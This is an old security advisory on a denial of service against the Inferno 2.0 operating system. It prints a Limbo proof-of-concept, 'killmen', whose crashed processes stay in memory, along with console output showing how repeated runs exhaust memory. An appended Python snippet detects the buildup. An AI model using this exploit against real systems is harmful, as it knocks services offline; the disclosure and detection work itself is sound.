- J.J.F. / Hackers Team - Security Advisory
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: 1/18/1999
Author: Conde Vampiro
URL: http://www.jjf.org
Application: Operating System: Inferno 2.0 over Windows platform.
(It may also affect all other platforms running Inferno.)
Danger: A user can produce a DoS (Denial of Service) in its own memory.

-=-=-=-=-=-=-=-=
Introduction
-=-=-=-=-=-=-=-=

A program written in Limbo can produce a denial of service by consuming all
the memory of the computer. The commands Inferno provides to prevent this
kind of DoS are not able to stop this attack.

-=-=-=-=-=-=-=-=
In Detail
-=-=-=-=-=-=-=-=

Using the following program written in Limbo, we can consume all the memory
of the platform on which we are running Inferno.

------------ Source Code ---------------------------------------------------
#
# FILE: killmen.b
# DATE: 11/10/98
# CODER: Conde Vampiro of - J.J.F. / Hackers Team -
# ABSTRACT: A DoS (Denial of service) in Limbo for Inferno O.S
#
# http://www.jjf.org - J.J.F. / Hackers Team -

implement killmen;

include "sys.m";
sys: Sys;
include "draw.m";

i : int;
men : con "DoS by Conde Vampiro";
# Both arrays have length 0, so any index is out of bounds.
died := array[0] of int;
kill := array[0] of int;

killmen: module
{
    init: fn(ctxt: ref Draw->Context, nil: list of string);
};

init (ctxt: ref Draw->Context, nil: list of string)
{
    sys = load Sys Sys->PATH;
    sys->print("%s\n\n", men);

    # The first iteration already raises "array bounds error".
    for (i:=0;i<100;i++) {
        died[i]=kill[i];
    }
}
------------ EOF -------------------------------------------------------------

If a user executes this program on an Inferno console, it will produce the
following error:

colmillo$ killmen
DoS by Conde Vampiro

[killmen] Broken: "array bounds error"
17 "killmen":array bounds error
colmillo$

We can observe that the program "killmen" has produced an error and that the
shell tells us its pid, in this case 17.
If we execute the 'ps' command, it will show the following result:

colmillo$ ps
  1   1  Conde Vampiro  release   1K  Sh[$Sys]
  6   6  inferno        alt      19K  Wm
  7   6  inferno        release   4K  Wm[$Sys]
  8   6  inferno        release   4K  Wm[$Sys]
 11  10  inferno        recv     16K  Plumb
 12  10  inferno        alt      16K  Plumb
 13  10  inferno        alt      16K  Plumb
 17   1  Conde Vampiro  broken   10K  killmen
 18   1  Conde Vampiro  ready     1K  Ps[$Sys]
colmillo$

The program "killmen" still remains in memory, although it has produced an
error. If we keep executing this program for a while, it will consume all
the memory; this can easily be done using Mash, the scripting shell of
Inferno.

If the administrator has not started the Inferno window interface or has not
bound the 'ps' command to the /prog directory, the "killmen" program will be
hidden and 'ps' will not show the processes in memory, but they are there.

The 'slayer' command is used to kill "broken" processes, but it will not kill
"killmen".

If we go to the /prog directory we can see all the processes as files:

colmillo$ cd /prog
colmillo$ ls -l
dr-xr-xr-x p 0 Conde Vampiro Conde Vampiro 0 Jan 18 17:53 1
dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 11
dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 12
dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 13
dr-xr-xr-x p 0 Conde Vampiro Conde Vampiro 0 Jan 18 17:53 17
dr-xr-xr-x p 0 Conde Vampiro Conde Vampiro 0 Jan 18 17:53 22
dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 6
dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 7
dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 8
colmillo$

Processes 17 and 22 are instances of the "killmen" program that are still in
memory, and every time the program is executed it will create a new "broken"
process in memory.

-=-=-=-=-=-=-=-=

Byes All

conde@jjf.org
http://www.jjf.org

- J.J.F. / Hackers Team - Security Advisory
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
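
Added example (not part of the original advisory, and not J.J.F. code): one way an administrator could spot the accumulation described above is to parse captured 'ps' output and total the "broken" processes per user and module. The function names, the threshold and the sample lines for pids 22 and 23 are assumptions; the column layout is read from the advisory's listing.

```python
import re
from collections import defaultdict

# Constructed sample: the advisory's 'ps' listing, plus a second broken
# killmen entry for pid 22 (its 10K size is assumed, not from the page).
SAMPLE_PS = """\
1 1 Conde Vampiro release 1K Sh[$Sys]
6 6 inferno alt 19K Wm
7 6 inferno release 4K Wm[$Sys]
8 6 inferno release 4K Wm[$Sys]
11 10 inferno recv 16K Plumb
12 10 inferno alt 16K Plumb
13 10 inferno alt 16K Plumb
17 1 Conde Vampiro broken 10K killmen
22 1 Conde Vampiro broken 10K killmen
23 1 Conde Vampiro ready 1K Ps[$Sys]
"""

# Columns as they appear in the listing: pid, second numeric column, user,
# state, size in K, module. The user name may contain spaces, so the user
# group is non-greedy and the last three fields are anchored to line end.
PS_LINE = re.compile(r"^\s*(\d+)\s+(\d+)\s+(.+?)\s+(\S+)\s+(\d+)K\s+(\S+)\s*$")

def parse_ps(text):
    """Return one dict per well-formed 'ps' line; skip anything else."""
    procs = []
    for line in text.splitlines():
        m = PS_LINE.match(line)
        if m:
            pid, grp, user, state, size_k, module = m.groups()
            procs.append({"pid": int(pid), "grp": int(grp), "user": user,
                          "state": state, "size_k": int(size_k), "module": module})
    return procs

def broken_summary(procs):
    """Group processes in state 'broken' by (user, module)."""
    summary = defaultdict(lambda: {"count": 0, "pids": [], "total_k": 0})
    for p in procs:
        if p["state"] == "broken":
            entry = summary[(p["user"], p["module"])]
            entry["count"] += 1
            entry["pids"].append(p["pid"])
            entry["total_k"] += p["size_k"]
    return dict(summary)

def flag_accumulation(summary, max_broken=1):
    """Return (user, module) keys holding more than max_broken broken processes."""
    return sorted(k for k, v in summary.items() if v["count"] > max_broken)
```

As the advisory notes, 'ps' only shows these processes when /prog is bound, so the capture has to come from a namespace where it is.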